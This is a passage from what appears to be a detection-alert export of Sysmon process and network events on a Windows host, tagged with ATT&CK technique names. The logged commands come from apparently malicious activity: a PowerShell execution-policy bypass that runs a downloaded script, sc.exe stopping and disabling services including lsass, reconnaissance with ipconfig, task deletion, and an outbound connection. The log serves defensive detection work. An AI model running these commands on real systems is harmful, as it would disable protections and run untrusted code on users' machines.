lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.197"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001090dc2000}"",""processId"":""3564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.541",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.128 
+ProcessGuid: {df9fc3d3-b393-5ecf-0000-001025da2000} +ProcessId: 1988 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.130330200Z"",""eventRecordID"":""2608"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.128\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001025da2000}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.128"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001025da2000}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.478",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.055 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001091d72000} +ProcessId: 8136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.058036800Z"",""eventRecordID"":""2605"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.055\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001091d72000}\r\nProcessId: 8136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.055"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001091d72000}"",""processId"":""8136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.462",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.037 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010c6d62000} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SVSHost Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SVSHost Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.041413500Z"",""eventRecordID"":""2604"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.037\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010c6d62000}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SVSHost Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:27.037"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010c6d62000}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SVSHost Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.400",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.001 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001031d52000} +ProcessId: 5964 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.012980100Z"",""eventRecordID"":""2602"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.001\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001031d52000}\r\nProcessId: 5964\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.001"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001031d52000}"",""processId"":""5964"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:40.869",8,"ATT&CK T1086: PowerShell Network Connections","""Network connection detected: +RuleName: +UtcTime: 2020-05-28 12:50:11.316 +ProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ProcessId: 2268 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 50014 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 
50.19.115.217 +DestinationHostname: +DestinationPort: 443 +DestinationPortName: https""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:12.494410500Z"",""eventRecordID"":""2598"",""processID"":""2260"",""threadID"":""2980"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:11.316\r\nProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nProcessId: 2268\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 50014\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 50.19.115.217\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:11.316"",""processGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""processId"":""2268"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""50014"",""destinationIsIpv6"":""false"",""destinationIp"":""50.19.115.217"",""destinationPort"":""443"",""destinationPortName"":""https""}}}", +"May 29, 2020 @ 14:18:38.042",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:09.606 +ProcessGuid: {df9fc3d3-b381-5ecf-0000-001073791f00} +ProcessId: 3880 +Image: 
C:\Windows\System32\ipconfig.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: IP Configuration Utility +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: ipconfig.exe +CommandLine: ""C:\Windows\system32\ipconfig.exe"" /all +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=741462AB431A22233C787BAAB9B653C7,SHA256=A4370C0CF81686C0B696FA6261C9D3E0D810AE704AB8301839DFFD5D5112F476,IMPHASH=34F72BB663765CAD1BC50368A1637C03 +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\system32\\ipconfig.exe\"" /all",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:09.613595500Z"",""eventRecordID"":""2529"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:09.606\r\nProcessGuid: {df9fc3d3-b381-5ecf-0000-001073791f00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\ipconfig.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: IP Configuration Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
ipconfig.exe\r\nCommandLine: \""C:\\Windows\\system32\\ipconfig.exe\"" /all\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=741462AB431A22233C787BAAB9B653C7,SHA256=A4370C0CF81686C0B696FA6261C9D3E0D810AE704AB8301839DFFD5D5112F476,IMPHASH=34F72BB663765CAD1BC50368A1637C03\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:09.606"",""processGuid"":""{df9fc3d3-b381-5ecf-0000-001073791f00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\ipconfig.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""IP Configuration Utility"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""ipconfig.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\"" /all"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=741462AB431A22233C787BAAB9B653C7,SHA256=A4370C0CF81686C0B696FA6261C9D3E0D810AE704AB8301839DFFD5D5112F476,IMPHASH=34F72BB663765CAD1BC50368A1637C03"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:18:33.509",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.229 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001027ca1e00} +ProcessId: 5044 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: 